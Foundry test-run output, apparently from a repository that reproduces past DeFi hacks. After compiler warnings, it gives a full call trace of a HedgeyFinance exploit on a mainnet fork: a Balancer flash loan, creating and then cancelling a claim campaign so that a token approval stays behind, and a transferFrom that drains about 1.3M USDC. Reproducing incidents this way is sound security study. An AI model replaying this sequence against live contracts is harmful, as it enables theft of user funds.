Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.23s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-04/HedgeyFinance_exp.sol:70:5:
   |
70 |     IERC20 private constant USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-04/HedgeyFinance_exp.sol:73:5:
   |
73 |     IClaimCampaigns private constant HedgeyFinance = IClaimCampaigns(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
  --> src/test/2024-04/HedgeyFinance_exp.sol:66:1:
   |
66 | contract HedgeyFinance is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-04/HedgeyFinance_exp.sol:107:9:
    |
107 |         uint256[] memory amounts,
    |         ^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-04/HedgeyFinance_exp.sol:108:9:
    |
108 |         uint256[] memory fees,
    |         ^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 705.61ms (4.21ms CPU time)

Ran 1 test for src/test/2024-04/HedgeyFinance_exp.sol:HedgeyFinance
[PASS] testExploit() (gas: 336291)
Logs:
  Attacker USDC balance before exploit: 0.000000000000000000
  Attacker USDC balance after exploit: 1303910.120000

Traces:
  [7072] HedgeyFinance::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19687889 [1.968e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], "USDC")
    │   └─ ← [Return]
    ├─ [0] VM::label(BalancerVault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], "BalancerVault")
    │   └─ ← [Return]
    └─ ← [Stop]

  [425629] HedgeyFinance::testExploit()
    ├─ [0] VM::deal(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker USDC balance before exploit", val: 0, decimals: 18)
    ├─ [371615] BalancerVault::flashLoan(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], [1305000000000 [1.305e12]], 0x)
    │   ├─ [9839] USDC::balanceOf(BalancerVault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(BalancerVault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [delegatecall]
    │   │   │   └─ ← [Return] 9617246330732 [9.617e12]
    │   │   └─ ← [Return] 9617246330732 [9.617e12]
    │   ├─ [2350] 0xce88686553686DA562CE7Cea497CE749DA109f9F::getFlashLoanFeePercentage() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [32152] USDC::transfer(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1305000000000 [1.305e12])
    │   │   ├─ [31363] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transfer(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1305000000000 [1.305e12]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: BalancerVault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], to: HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1305000000000 [1.305e12])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x0000000000000000000000000000000000000000000000000000012fd80fba00
    │   │   │   │   @ 0x231554ca30e30e3daf1985a58abe660eac42605fd6c849ff49b261c6a9f01b7d: 0x000000000000000000000000000000000000000000000000000008bf308d1f6c → 0x0000000000000000000000000000000000000000000000000000078f587d656c
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [305506] HedgeyFinance::receiveFlashLoan([0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], [1305000000000 [1.305e12]], [0], 0x)
    │   │   ├─ [25462] USDC::approve(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, 1305000000000 [1.305e12])
    │   │   │   ├─ [24673] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::approve(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, 1305000000000 [1.305e12]) [delegatecall]
    │   │   │   │   ├─ emit Approval(owner: HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, value: 1305000000000 [1.305e12])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xfb80629a90f0bcc1d245f4b789a834c3532103b55f2230a7fa5f5379c4fd2c55: 0 → 0x0000000000000000000000000000000000000000000000000000012fd80fba00
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [225161] 0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511::createLockedCampaign(0x00000000000000000000000000000001, Campaign({ manager: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, token: 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, amount: 1305000000000 [1.305e12], end: 3133666800 [3.133e9], tokenLockup: 1, root: 0x0000000000000000000000000000000000000000000000000000000000000000 }), ClaimLockup({ tokenLocker: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, start: 0, cliff: 0, period: 0, periods: 0 }), Donation({ tokenLocker: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, amount: 0, rate: 0, start: 0, cliff: 0, period: 0 }))
    │   │   │   ├─ [3339] USDC::balanceOf(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511) [staticcall]
    │   │   │   │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1303910120000 [1.303e12]
    │   │   │   │   └─ ← [Return] 1303910120000 [1.303e12]
    │   │   │   ├─ [1339] USDC::balanceOf(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1305000000000 [1.305e12]
    │   │   │   │   └─ ← [Return] 1305000000000 [1.305e12]
    │   │   │   ├─ [9349] USDC::transferFrom(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, 1305000000000 [1.305e12])
    │   │   │   │   ├─ [8554] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transferFrom(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, 1305000000000 [1.305e12]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, value: 1305000000000 [1.305e12])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfb80629a90f0bcc1d245f4b789a834c3532103b55f2230a7fa5f5379c4fd2c55: 0x0000000000000000000000000000000000000000000000000000012fd80fba00 → 0
    │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000012fd80fba00 → 0
    │   │   │   │   │   │   @ 0x69542905f4a613fcf1c6829cafb09d50a2036d3ba90c650967995bda63740efb: 0x0000000000000000000000000000000000000000000000000000012f97197a40 → 0x0000000000000000000000000000000000000000000000000000025f6f293440
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [1339] USDC::balanceOf(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511) [staticcall]
    │   │   │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 2608910120000 [2.608e12]
    │   │   │   │   └─ ← [Return] 2608910120000 [2.608e12]
    │   │   │   ├─ [3448] USDC::allowance(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   ├─ [2659] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::allowance(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [23362] USDC::approve(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1305000000000 [1.305e12])
    │   │   │   │   ├─ [22573] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::approve(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1305000000000 [1.305e12]) [delegatecall]
    │   │   │   │   │   ├─ emit Approval(owner: 0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, spender: HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1305000000000 [1.305e12])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x6881d87fce455e0d3711796721d61c9c97d1860d1a2afdcf7555e09eef538b94: 0 → 0x0000000000000000000000000000000000000000000000000000012fd80fba00
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  emit topic 0: 0xce04f3b9b2dfc43b1d1e78376db74a3b32c0a78daaf34efc81334908359448fc
    │   │   │   │        topic 1: 0x0000000000000000000000000000000100000000000000000000000000000000
    │   │   │   │           data: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─  emit topic 0: 0x08e5218da97ab939144e67510d646e499712fb36e2305d6dffdf06b7447e48f9
    │   │   │   │        topic 1: 0x0000000000000000000000000000000100000000000000000000000000000000
    │   │   │   │           data: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000012fd80fba0000000000000000000000000000000000000000000000000000000000bac7f5f000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xacf4cc2b7e323627d65483abdab53dccd9382ef97cd8237f93b646fdcd1be03d: 0 → 0x000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48
    │   │   │   │   @ 0xacf4cc2b7e323627d65483abdab53dccd9382ef97cd8237f93b646fdcd1be03e: 0 → 0x0000000000000000000000000000000000000000000000000000012fd80fba00
    │   │   │   │   @ 0x7ede84b14c780bfe198602ef965c4e97d471d80038c630a4daf375bca558cf84: 0 → 1
    │   │   │   │   @ 0x1b26ae0577a75f64c64236f744a9a88c07a708e2c134055844c341090f3e98b9: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   @ 0xacf4cc2b7e323627d65483abdab53dccd9382ef97cd8237f93b646fdcd1be03c: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   @ 0xacf4cc2b7e323627d65483abdab53dccd9382ef97cd8237f93b646fdcd1be040: 0 → 1
    │   │   │   │   @ 0xacf4cc2b7e323627d65483abdab53dccd9382ef97cd8237f93b646fdcd1be03f: 0 → 0x00000000000000000000000000000000000000000000000000000000bac7f5f0
    │   │   │   └─ ← [Return]
    │   │   ├─ [37115] 0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511::cancelCampaign(0x00000000000000000000000000000001)
    │   │   │   ├─ [1339] USDC::balanceOf(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [25352] USDC::transfer(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1305000000000 [1.305e12])
    │   │   │   │   ├─ [24563] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transfer(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1305000000000 [1.305e12]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: 0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, to: HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1305000000000 [1.305e12])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x0000000000000000000000000000000000000000000000000000012fd80fba00
    │   │   │   │   │   │   @ 0x69542905f4a613fcf1c6829cafb09d50a2036d3ba90c650967995bda63740efb: 0x0000000000000000000000000000000000000000000000000000025f6f293440 → 0x0000000000000000000000000000000000000000000000000000012f97197a40
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [1339] USDC::balanceOf(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1305000000000 [1.305e12]
    │   │   │   │   └─ ← [Return] 1305000000000 [1.305e12]
    │   │   │   ├─ emit CampaignCancelled(param0: 0x00000000000000000000000000000001)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xacf4cc2b7e323627d65483abdab53dccd9382ef97cd8237f93b646fdcd1be03c: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496 → 0
    │   │   │   │   @ 0x1b26ae0577a75f64c64236f744a9a88c07a708e2c134055844c341090f3e98b9: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496 → 0
    │   │   │   │   @ 0xacf4cc2b7e323627d65483abdab53dccd9382ef97cd8237f93b646fdcd1be03f: 0x00000000000000000000000000000000000000000000000000000000bac7f5f0 → 0
    │   │   │   │   @ 0xacf4cc2b7e323627d65483abdab53dccd9382ef97cd8237f93b646fdcd1be03e: 0x0000000000000000000000000000000000000000000000000000012fd80fba00 → 0
    │   │   │   │   @ 0xacf4cc2b7e323627d65483abdab53dccd9382ef97cd8237f93b646fdcd1be03d: 0x000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48 → 0
    │   │   │   │   @ 0xacf4cc2b7e323627d65483abdab53dccd9382ef97cd8237f93b646fdcd1be040: 1 → 0
    │   │   │   └─ ← [Return]
    │   │   ├─ [5452] USDC::transfer(BalancerVault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 1305000000000 [1.305e12])
    │   │   │   ├─ [4663] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transfer(BalancerVault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 1305000000000 [1.305e12]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BalancerVault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], value: 1305000000000 [1.305e12])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x231554ca30e30e3daf1985a58abe660eac42605fd6c849ff49b261c6a9f01b7d: 0x0000000000000000000000000000000000000000000000000000078f587d656c → 0x000000000000000000000000000000000000000000000000000008bf308d1f6c
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000012fd80fba00 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0: 2 → 1
    │   │   │   @ 0xfb80629a90f0bcc1d245f4b789a834c3532103b55f2230a7fa5f5379c4fd2c55: 0 → 0x0000000000000000000000000000000000000000000000000000012fd80fba00
    │   │   └─ ← [Stop]
    │   ├─ [1339] USDC::balanceOf(BalancerVault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(BalancerVault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [delegatecall]
    │   │   │   └─ ← [Return] 9617246330732 [9.617e12]
    │   │   └─ ← [Return] 9617246330732 [9.617e12]
    │   ├─ emit FlashLoan(param0: HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], param2: 1305000000000 [1.305e12], param3: 0)
    │   └─ ← [Stop]
    ├─ [1339] USDC::balanceOf(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511) [staticcall]
    │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511) [delegatecall]
    │   │   └─ ← [Return] 1303910120000 [1.303e12]
    │   └─ ← [Return] 1303910120000 [1.303e12]
    ├─ [29249] USDC::transferFrom(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1303910120000 [1.303e12])
    │   ├─ [28454] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transferFrom(0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1303910120000 [1.303e12]) [delegatecall]
    │   │   ├─ emit Transfer(from: 0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511, to: HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1303910120000 [1.303e12])
    │   │   ├─  storage changes:
    │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x0000000000000000000000000000000000000000000000000000012f97197a40
    │   │   │   @ 0x6881d87fce455e0d3711796721d61c9c97d1860d1a2afdcf7555e09eef538b94: 0x0000000000000000000000000000000000000000000000000000012fd80fba00 → 0x0000000000000000000000000000000000000000000000000000000040f63fc0
    │   │   │   @ 0x69542905f4a613fcf1c6829cafb09d50a2036d3ba90c650967995bda63740efb: 0x0000000000000000000000000000000000000000000000000000012f97197a40 → 0
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [1339] USDC::balanceOf(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(HedgeyFinance: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 1303910120000 [1.303e12]
    │   └─ ← [Return] 1303910120000 [1.303e12]
    ├─ [3164] USDC::decimals() [staticcall]
    │   ├─ [2381] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::decimals() [delegatecall]
    │   │   └─ ← [Return] 6
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Attacker USDC balance after exploit", val: 1303910120000 [1.303e12], decimals: 6)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 14.67s (12.69s CPU time)

Ran 2 test suites in 15.99s (15.38s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
